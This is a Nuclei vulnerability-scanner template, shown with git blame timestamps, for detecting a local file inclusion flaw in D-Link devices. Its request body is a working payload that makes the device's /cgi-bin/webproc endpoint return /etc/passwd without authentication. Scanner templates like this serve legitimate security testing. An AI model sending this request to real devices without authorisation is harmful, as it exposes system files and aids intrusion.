nuclei-templates/http/misconfiguration/d-link-arbitary-fileread.yaml

37 lines
933 B
YAML
Raw Permalink Normal View History

2021-03-02 14:09:19 +00:00
id: dlink-file-read
info:
name: D-Link - Local File Inclusion
2021-03-02 14:09:19 +00:00
author: dhiyaneshDK
severity: high
description: D-Link is vulnerable to local file inclusion.
reference:
- https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: dlink,lfi,misconfig
2021-03-02 14:09:19 +00:00
http:
2021-03-02 14:09:19 +00:00
- method: POST
path:
- "{{BaseURL}}/cgi-bin/webproc"
2023-10-14 11:27:55 +00:00
2021-03-02 15:44:29 +00:00
body: 'errorpage=/etc/passwd&obj-action=auth&:action=login'
matchers-condition: and
2021-03-02 14:09:19 +00:00
matchers:
2021-03-02 15:44:29 +00:00
- type: regex
regex:
- "root:.*:0:0:"
2021-03-02 14:09:19 +00:00
part: body
2021-03-02 15:44:29 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100f7bd8598111c8790c4765d5023a269ec4d6bf67938445016ed3c480f14f2ca9c022100841c818f240753055b08c7e7f11648e19140002ce423fa482c1638f2bc8f860c:922c64590222798bb761d5b6d8e72950